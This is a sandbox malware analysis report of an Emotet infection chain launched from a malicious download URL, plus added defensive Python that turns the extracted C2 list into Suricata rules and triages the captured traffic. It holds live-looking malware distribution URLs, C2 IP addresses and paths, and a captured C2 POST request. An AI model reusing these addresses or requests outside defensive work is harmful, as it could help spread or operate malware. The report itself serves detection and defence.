Analysis Report http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 206892
Start date: 07.02.2020
Start time: 21:12:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: urldownload.jbs
Sample URL: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.win@10/19@2/6
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 65.7% (good quality ratio 62.3%)
  • Quality average: 79.8%
  • Quality standard deviation: 28.7%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 24
  • Number of non-executed functions: 482
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 13.107.3.128, 13.107.5.88, 52.109.88.8, 52.109.88.35, 52.114.128.10, 40.90.137.125, 40.90.137.126, 40.90.23.154, 51.105.249.223
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, client-office365-tas.msedge.net, afdo-tas-offload.trafficmanager.net, lgin.msa.trafficmanager.net, am3p.wns.notify.windows.com.akadns.net, prod.configsvc1.live.com.akadns.net, s-0001.s-msedge.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, wns.notify.windows.com.akadns.net, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, prd.col.aria.mobile.skypedata.akadns.net, pipe.skype.com, login.live.com, emea1.notify.windows.com.akadns.net, config.officeapps.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, config.edge.skype.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, pipe.cloudapp.aria.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Emotet
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



MITRE ATT&CK Matrix

Techniques by tactic. The numbers in parentheses are the signature-count badges the matrix shows beside a technique, in the order shown; techniques listed without a number appear in the matrix but had no matching signature.

Initial Access:
  • Listed without hits: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service
Execution:
  • Windows Management Instrumentation (1 1)
  • PowerShell (4)
  • Scripting (1 1)
  • Execution through API (2)
  • Execution through Module Load (1)
  • Graphical User Interface (1)
  • Command-Line Interface (1 1)
  • Listed without hits: Third-party Software
Persistence:
  • Hidden Files and Directories (1)
  • Listed without hits: Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts
Privilege Escalation:
  • Process Injection (1 1 2)
  • Listed without hits: Accessibility Features, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task
Defense Evasion:
  • Software Packing (1)
  • Deobfuscate/Decode Files or Information (1 1)
  • Scripting (1 1)
  • Obfuscated Files or Information (1 2 1)
  • Masquerading (2 3 1)
  • Hidden Files and Directories (1)
  • Virtualization/Sandbox Evasion (2)
  • Process Injection (1 1 2)
Credential Access:
  • Input Capture (2)
  • Listed without hits: Network Sniffing, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History
Discovery:
  • System Time Discovery (2)
  • Security Software Discovery (1 2 1)
  • File and Directory Discovery (2)
  • System Information Discovery (3 7)
  • Virtualization/Sandbox Evasion (2)
  • Process Discovery (2)
  • Application Window Discovery (1 1)
  • Remote System Discovery (1)
Lateral Movement:
  • Remote File Copy (1)
  • Listed without hits: Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol
Collection:
  • Input Capture (2)
  • Listed without hits: Data from Removable Media, Data from Network Shared Drive, Data Staged, Screen Capture, Email Collection, Clipboard Data
Exfiltration:
  • Data Encrypted (1)
  • Listed without hits: Exfiltration Over Other Network Medium, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol
Command and Control:
  • Commonly Used Port (1)
  • Remote File Copy (1)
  • Standard Cryptographic Protocol (1)
  • Standard Non-Application Layer Protocol (3)
  • Standard Application Layer Protocol (3)
  • Listed without hits: Uncommonly Used Port
Network Effects:
  • Listed without hits: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects:
  • Listed without hits: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact:
  • Listed without hits: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://ta-behesht.ir/images/Provx00a/ | Avira URL Cloud: Label: malware
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/ | Avira URL Cloud: Label: phishing
Source: http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/ | Avira URL Cloud: Label: malware
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/3 | Avira URL Cloud: Label: phishing
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/5 | Avira URL Cloud: Label: phishing
Source: http://tatcogroup.ir/wp-admin/UC/ | Avira URL Cloud: Label: malware
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/9 | Avira URL Cloud: Label: phishing
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/= | Avira URL Cloud: Label: phishing
Source: http://tcpartner.ru/wp-includes/nr8/ | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\879.exe | Avira: detection malicious, Label: TR/AD.Emotet.aouip
Found malware configuration
Source: LaunchWinApp.exe.6044.13.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["71.126.247.90/9VRKRX4VeY", "104.236.28.47/z97ZWdfizXfGwwe", "104.236.28.47:8080", "80.86.91.91:8080", "80.86.91.91/otfaQrdMERYnyFW", "98.239.119.52/eKuzQTBgBoX", "0.86.91.91:8080"]}
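The configuration extractor output above lists the Emotet C2 entries in a mix of `ip/path`, `ip:port` and bare `ip` forms, and one of them, "0.86.91.91:8080", falls in the reserved 0.0.0.0/8 block and is not routable. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling: it parses that list into (ip, port, path) indicators, rejects entries that are not globally routable instead of guessing what they should have been, and emits one Suricata rule per endpoint. The default port of 80 for entries without one, the local SID range starting at 9000001 and the rule wording are this example's own assumptions.

```python
"""Normalize an extracted Emotet C2 list into indicators and Suricata rules.

Added example, not part of the sandbox report. The input string below is the
"Malware Configuration Extractor" output copied from the report; the field
names, default port, SID range and rule wording are this example's choices.
"""
import ipaddress
import json
import re
from typing import Dict, List, Optional, Tuple

# The C2 list exactly as the report extracted it, including the odd entry
# "0.86.91.91:8080" (reserved 0.0.0.0/8, see RFC 1122).
EXTRACTED_CONFIG = (
    'Emotet {"C2 list": ["71.126.247.90/9VRKRX4VeY", '
    '"104.236.28.47/z97ZWdfizXfGwwe", "104.236.28.47:8080", '
    '"80.86.91.91:8080", "80.86.91.91/otfaQrdMERYnyFW", '
    '"98.239.119.52/eKuzQTBgBoX", "0.86.91.91:8080"]}'
)

# host[:port][/path]; Emotet configs carry bare IPv4 addresses, so the host
# part is restricted to a dotted quad.
C2_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d{1,5}))?(?P<path>/.*)?$"
)


def parse_c2_entry(entry: str) -> Optional[Dict[str, object]]:
    """Split one C2 string into ip/port/path; return None if it is not usable.

    Rejected: malformed entries, out-of-range ports, and addresses that are not
    globally routable (reserved, private, loopback, ...). Rejecting rather than
    "repairing" keeps the analyst from inventing an indicator the sample never
    carried. Port 80 is assumed when the entry gives none.
    """
    m = C2_RE.match(entry.strip())
    if not m:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group("ip"))
    except ipaddress.AddressValueError:
        return None
    if not ip.is_global:
        return None
    port = int(m.group("port") or 80)
    if not 1 <= port <= 65535:
        return None
    return {"ip": str(ip), "port": port, "path": m.group("path") or "/"}


def extract_indicators(config_text: str) -> Dict[str, object]:
    """Return sorted (ip, port) endpoints, their paths, and the rejected raw entries."""
    config = json.loads(config_text[config_text.index("{"):])
    accepted: Dict[Tuple[str, int], set] = {}
    rejected: List[str] = []
    for entry in config.get("C2 list", []):
        parsed = parse_c2_entry(entry)
        if parsed is None:
            rejected.append(entry)
            continue
        key = (parsed["ip"], parsed["port"])
        accepted.setdefault(key, set()).add(parsed["path"])
    return {
        "endpoints": sorted(accepted),
        "paths": {k: sorted(v) for k, v in accepted.items()},
        "rejected": rejected,
    }


def suricata_rules(endpoints: List[Tuple[str, int]], first_sid: int = 9000001) -> List[str]:
    """One flow-based rule per endpoint; SIDs are assumed free in the local range."""
    rules = []
    for i, (ip, port) in enumerate(endpoints):
        rules.append(
            f'alert tcp $HOME_NET any -> {ip} {port} '
            f'(msg:"Emotet C2 contact {ip}:{port}"; flow:to_server,established; '
            f'classtype:trojan-activity; sid:{first_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    result = extract_indicators(EXTRACTED_CONFIG)
    for ip, port in result["endpoints"]:
        print(f"{ip}:{port}  paths={result['paths'][(ip, port)]}")
    print("rejected:", result["rejected"])
    print("\n".join(suricata_rules(result["endpoints"])))
```

Running it yields six endpoints (104.236.28.47 on 80 and 8080, 80.86.91.91 on 80 and 8080, 71.126.247.90 and 98.239.119.52 on 80) and reports "0.86.91.91:8080" as rejected, so the bad entry is visible to the analyst rather than silently dropped or silently "corrected".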
Multi AV Scanner detection for domain / URL
Source: sepi.org.br | Virustotal: Detection: 8%
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/ | Virustotal: Detection: 21%
Source: http://tcpartner.ru/wp-includes/nr8/ | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\879.exe | Virustotal: Detection: 45%
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\download\QDC5QK1.doc | Joe Sandbox ML: detected

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\879.exe | Code function: 12_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,12_2_00428AA3
Source: C:\Users\user\879.exe | Code function: 12_2_0042FC18 lstrlen,FindFirstFileA,FindClose,12_2_0042FC18
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe | Code function: 13_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,13_2_00428AA3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe | Code function: 13_2_0042FC18 lstrlen,FindFirstFileA,FindClose,13_2_0042FC18

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49802 -> 104.236.28.47:8080
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
    GET /images/Provx00a/ HTTP/1.1
    Host: ta-behesht.ir
    Connection: Keep-Alive
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 71.126.247.90 (reported 3 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 98.239.119.52 (reported 3 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.91 (reported 3 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 104.236.28.47 (reported 6 times)
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
    GET /admin/assets/uploads/parts_service/61ywox9d8/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Accept: */*
    Accept-Encoding: identity
    Host: sepi.org.br
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/Provx00a/ HTTP/1.1
    Host: ta-behesht.ir
    Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: sepi.org.br
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /z97ZWdfizXfGwwe/Cx9BA/ HTTP/1.1
    Referer: http://104.236.28.47/z97ZWdfizXfGwwe/Cx9BA/
    Content-Type: multipart/form-data; boundary=---------------------------427870309695181
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 104.236.28.47:8080
    Content-Length: 4644
    Connection: Keep-Alive
    Cache-Control: no-cache
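The networking signatures above rest on three observations: TCP connections to addresses that no DNS answer ever pointed at, a GET that carries no User-Agent header, and a multipart POST whose Host header is a bare IP on port 8080. The Python below is an added example, not part of the report, that reproduces those checks over the recorded data so the logic can be reused on other captures: it correlates connection destinations with DNS answers and runs header heuristics over the three requests as captured. The requests and destination IPs are copied from the report; the DNS answer for sepi.org.br (203.0.113.10, a TEST-NET-3 address), the destination ports for the four direct-to-IP connections (8080 where the extracted configuration gives one, otherwise 80) and the flag names are constructed for the example.

```python
"""Triage of the network observations in the report: direct-to-IP connections
and HTTP request anomalies.

Added example, not part of the sandbox report. HTTP requests and destination
IPs are copied from the report; the DNS answer, the connection ports and the
flag names are constructed so the example runs offline.
"""
import ipaddress
from typing import Dict, List, Set, Tuple

# Constructed: the report only records that sepi.org.br was queried, not the
# answer; any routable address works for the correlation shown here.
DNS_ANSWERS: Dict[str, Set[str]] = {"sepi.org.br": {"203.0.113.10"}}

# Destinations the sandbox saw TCP traffic to (report: "TCP traffic detected
# without corresponding DNS query") plus the constructed sepi.org.br address.
# Ports are assumed: 8080 where the extracted config lists one, else 80.
TCP_DESTINATIONS: List[Tuple[str, int]] = [
    ("203.0.113.10", 80), ("71.126.247.90", 80), ("98.239.119.52", 80),
    ("80.86.91.91", 8080), ("104.236.28.47", 8080),
]

# Raw requests as the report shows them, with CRLF line breaks restored.
HTTP_REQUESTS: List[str] = [
    "GET /admin/assets/uploads/parts_service/61ywox9d8/ HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\n"
    "Accept: */*\r\nAccept-Encoding: identity\r\nHost: sepi.org.br\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /images/Provx00a/ HTTP/1.1\r\nHost: ta-behesht.ir\r\nConnection: Keep-Alive\r\n\r\n",
    "POST /z97ZWdfizXfGwwe/Cx9BA/ HTTP/1.1\r\n"
    "Referer: http://104.236.28.47/z97ZWdfizXfGwwe/Cx9BA/\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------427870309695181\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: 104.236.28.47:8080\r\nContent-Length: 4644\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
]


def connections_without_dns(conns: List[Tuple[str, int]],
                            dns_answers: Dict[str, Set[str]]) -> List[Tuple[str, int]]:
    """Destinations no DNS answer pointed at; hard-coded C2 addresses are the usual cause."""
    known = set().union(*dns_answers.values()) if dns_answers else set()
    return [c for c in conns if c[0] not in known]


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (method, request-target, lowercase-keyed headers) for one HTTP/1.1 request."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def host_is_bare_ip(host: str) -> bool:
    """True when the Host header is an IPv4 literal, optionally with :port.

    Bracketed IPv6 hosts are not handled; none appear in this capture.
    """
    candidate = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def request_flags(raw: str) -> List[str]:
    """Header heuristics matching what the report flags on these requests."""
    method, _target, headers = parse_request(raw)
    flags: List[str] = []
    if "user-agent" not in headers:
        flags.append("no-user-agent")
    host = headers.get("host", "")
    if host_is_bare_ip(host):
        flags.append("host-is-ip")
        if ":" in host and host.rsplit(":", 1)[1] not in ("80", "443"):
            flags.append("nonstandard-port")
    if method == "POST" and headers.get("content-type", "").startswith("multipart/form-data"):
        flags.append("multipart-post")
    return flags


def triage() -> Dict[str, object]:
    """Run both checks over the embedded capture, keyed by request target."""
    return {
        "direct_to_ip": connections_without_dns(TCP_DESTINATIONS, DNS_ANSWERS),
        "http": {parse_request(r)[1]: request_flags(r) for r in HTTP_REQUESTS},
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

The sepi.org.br download stays unflagged (it has a User-Agent and a hostname), the ta-behesht.ir GET is flagged only for the missing User-Agent, and the POST collects all three C2-shaped flags; the four addresses from the extracted configuration are the only connections with no DNS answer behind them.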
URLs found in memory or binary data
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp, LaunchWinApp.exe, 0000000D.00000002.2421255548.0000000000199000.00000004.00000001.sdmp | String found in binary or memory: http://104.236.28.47/z97ZWdfizXfGwwe/Cx9BA/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/.
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/8/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/H
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/LP9huDOLdT/hzs2Jh7RhkPtQ/x
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/Q/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/t
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp, LaunchWinApp.exe, 0000000D.00000003.2268467832.0000000000829000.00000004.00000001.sdmp | String found in binary or memory: http://71.126.247.90/9VRKRX4VeY/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://71.126.247.90/9VRKRX4VeY/)
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://71.126.247.90/9VRKRX4VeY/63
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://71.126.247.90/9VRKRX4VeY/=
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://71.126.247.90/9VRKRX4VeY/es
Source: LaunchWinApp.exe, 0000000D.00000003.2349207058.0000000000829000.00000004.00000001.sdmp | String found in binary or memory: http://80.86.91.91/otfaQrdMERYnyFWF/FJq67nt8LP9huDOLdT/hzs2Jh7RhkPtQ/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.91:8080/otfaQrdMERYnyFWF/FJq67nt8LP9huDOLdT/hzs2Jh7RhkPtQ/
Source: LaunchWinApp.exe, 0000000D.00000003.2349207058.0000000000829000.00000004.00000001.sdmp | String found in binary or memory: http://98.239.119.52/eKuzQTBgBoX/Ed6Na4LH7Tfp6v3/6XcTHH/lFom6PxxwyovtO2P8/C
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.dr | String found in binary or memory: http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmp, cmdline.out.2.dr | String found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmp | String found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/3
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmp | String found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/5
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmp | String found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/9
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmp | String found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/=
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmp | String found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/DC5QK1.4
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.dr | String found in binary or memory: http://ta-behesht.ir/images/Provx00a/
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.dr | String found in binary or memory: http://tatcogroup.ir/wp-admin/UC/
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.dr | String found in binary or memory: http://tcpartner.ru/wp-includes/nr8/
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.dr | String found in binary or memory: http://tepcian.utcc.ac.th/wp-admin/SquR/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.dr | Strings found in binary or memory:
    http://weather.service.msn.com/data.aspx
    https://analysis.windows.net/powerbi/api
    https://api.aadrm.com/
    https://api.diagnostics.office.com
    https://api.diagnosticssdf.office.com
    https://api.microsoftstream.com/api/
    https://api.onedrive.com
    https://api.powerbi.com/v1.0/myorg/datasets
    https://api.powerbi.com/v1.0/myorg/groups
    https://api.powerbi.com/v1.0/myorg/imports
    https://apis.live.net/v5.0/
    https://arc.msn.com/v4/api/selection
    https://asgsmsproxyapi.azurewebsites.net/
    https://augloop.office.com
    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    https://cdn.entity.
    https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    https://client-office365-tas.msedge.net/ab
    https://clients.config.office.net/
    https://clients.config.office.net/user/v1.0/android/policies
    https://clients.config.office.net/user/v1.0/ios
    https://clients.config.office.net/user/v1.0/mac
    https://cloudfiles.onenote.com/upload.aspx
    https://config.edge.skype.com
    https://config.edge.skype.com/config/v1/Office
    https://config.edge.skype.com/config/v2/Office
    https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
    https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
    https://cr.office.com
    https://dataservice.o365filtering.com
    https://dataservice.o365filtering.com/
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    https://dev0-api.acompli.net/autodetect
    https://devnull.onenote.com
    https://directory.services.
    https://entitlement.diagnostics.office.com
    https://entitlement.diagnosticssdf.office.com
    https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    https://globaldisco.crm.dynamics.com
    https://graph.ppe.windows.net
    https://graph.ppe.windows.net/
    https://graph.windows.net
    https://graph.windows.net/
    https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    https://hubblecontent.osi.office.net/contentsvc/browse?
    https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?
    https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    https://incidents.diagnostics.office.com
    https://incidents.diagnosticssdf.office.com
    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    https://insertmedia.bing.office.net/odc/insertmedia
    https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    https://lifecycle.office.com
    https://login.microsoftonline.com/
    https://login.windows-ppe.net/common/oauth2/authorize
    https://login.windows.local
    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    https://login.windows.net/common/oauth2/authorize
    https://loki.delve.office.com/api/v1/configuration/officewin32/
    https://lookup.onenote.com/lookup/geolocation/v1
    https://management.azure.com
    https://management.azure.com/
    https://messaging.office.com/
    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    https://ncus-000.contentsync.
    https://ncus-000.pagecontentsync.
    https://o365diagnosticsppe-web.cloudapp.net
    https://ocos-office365-s2s.msedge.net/ab
    https://ofcrecsvcapi-int.azurewebsites.net/
    https://officeapps.live.com
    https://officeci.azurewebsites.net/api/
    https://officesetup.getmicrosoftkey.com
    https://ogma.osi.office.net/TradukoApi/api/v1.0/
    https://onedrive.live.com
    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    https://onedrive.live.com/embed?
    https://outlook.office.com/autosuggest/api/v1/init?cvid=
    https://outlook.office365.com/api/v1.0/me/Activities
    https://outlook.office365.com/autodiscover/autodiscover.json
    https://ovisualuiapp.azurewebsites.net/pbiagave/
    https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    https://portal.office.com/account/?ref=ClientMeControl
    https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    https://powerlift-frontdesk.acompli.net
    https://powerlift.acompli.net
    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    https://prod-global-autodetect.acompli.net/autodetect
    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    https://res.getmicrosoftkey.com/api/redemptionevents
    https://rpsticket.partnerservices.getmicrosoftkey.com
    https://settings.outlook.com
    https://shell.suite.office.com:1443
    https://skyapi.live.net/Activity/
    https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    https://storage.live.com/clientlogs/uploadlocation
    https://store.office.cn/addinstemplate
    https://store.office.com/?productgroup=Outlook
    https://store.office.com/addinstemplate
    https://store.office.de/addinstemplate
    https://store.officeppe.com/addinstemplate
    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    https://tasks.office.com
    https://templatelogging.office.com/client/log
    https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
